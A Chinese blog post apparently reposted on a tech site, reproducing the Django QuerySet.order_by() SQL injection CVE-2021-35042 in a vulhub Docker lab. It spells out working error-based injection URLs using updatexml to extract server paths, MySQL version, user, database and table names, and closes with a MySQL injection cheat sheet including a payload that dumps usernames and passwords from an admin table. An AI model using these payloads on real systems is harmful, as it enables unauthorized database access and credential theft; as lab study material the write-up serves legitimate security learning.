IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> Python知识库 -> [ vulhub漏洞复现篇 ] Django SQL注入漏洞复现 CVE-2021-35042 -> 正文阅读

[Python知识库][ vulhub漏洞复现篇 ] Django SQL注入漏洞复现 CVE-2021-35042

🍬 博主介绍

👨?🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
?主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞?评论?收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论??一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

一、漏洞编号

CVE-2021-35042

二、漏洞描述

Django是一个开放源代码的Web应用框架,由Python写成。采用了MVC的框架模式,即模型M,视图V和控制器C。它最初是被开发来用于管理劳伦斯出版集团旗下的一些以新闻内容为主的网站的,即是CMS(内容管理系统)软件。

Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 SQL 注入攻击,最终造成服务器敏感信息泄露。

三、影响范围

Django < 3.2.5的Django 3.2版本
Django < 3.1.13的Django 3.1版本

四、环境搭建

1、进入CVE-2021-35042环境

cd vulhub/django/CVE-2021-35042

在这里插入图片描述

2、启动CVE-2021-35042环境

docker-compose up -d

在这里插入图片描述

3、查看CVE-2021-35042环境

docker-compose ps

在这里插入图片描述

4、访问CVE-2021-35042环境

http://192.168.13.131:8000/

在这里插入图片描述

5、查看CVE-2021-35042提示信息

cat README.md 

在这里插入图片描述

6、关闭CVE-2021-35042环境

复现完记得关闭环境

docker-compose down

在这里插入图片描述

五、漏洞复现

1、验证注入存在

转到也受攻击页面

http://192.168.13.131:8000/vuln/

在这里插入图片描述

添加order=-id参数

http://192.168.13.131:8000/vuln/?order=-id

在这里插入图片描述

看到按 id 降序排列的数据证明注入点存在,接下来构造报错注入来进行攻击获取数据信息。

2、获取根目录信息

添加order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@basedir)),1)%23到 GET 参数查看,其中vuln是我们的应用程序和collection模型。

http://192.168.13.131:8000/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@basedir)),1)%23

在这里插入图片描述

3、获取数据库MySQL版本

http://192.168.13.131:8000/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23

在这里插入图片描述

4、获取当前用户

http://192.168.13.131:8000/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select user())),1)%23

在这里插入图片描述

5、获取当前数据库名

http://192.168.13.131:8000/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,database()),1)%23

在这里插入图片描述

6、获取CVE数据库的表信息

http://192.168.13.131:8000/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,((select group_concat(table_name) from information_schema.tables where table_schema= 'cve'))),1)%23

在这里插入图片描述

7、mysql注入常用语句

爆数据库版本信息
?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

链接用户
?id=1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)

链接数据库
?id=1 and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)

爆库
?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select schema_name),0x7e) FROM admin limit 0,1),0x7e),1)

爆表
?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select table_name),0x7e) FROM admin limit 0,1),0x7e),1)

爆字段
?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select column_name),0x7e) FROM admin limit 0,1),0x7e),1)

爆字段内容
?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)

六、漏洞修复

及时更新到最新版本

  Python知识库 最新文章
Python中String模块
【Python】 14-CVS文件操作
python的panda库读写文件
使用Nordic的nrf52840实现蓝牙DFU过程
【Python学习记录】numpy数组用法整理
Python学习笔记
python字符串和列表
python如何从txt文件中解析出有效的数据
Python编程从入门到实践自学/3.1-3.2
python变量
上一篇文章      下一篇文章      查看所有文章
加:2022-09-30 00:49:11  更:2022-09-30 00:49:59 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 12:24:58-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码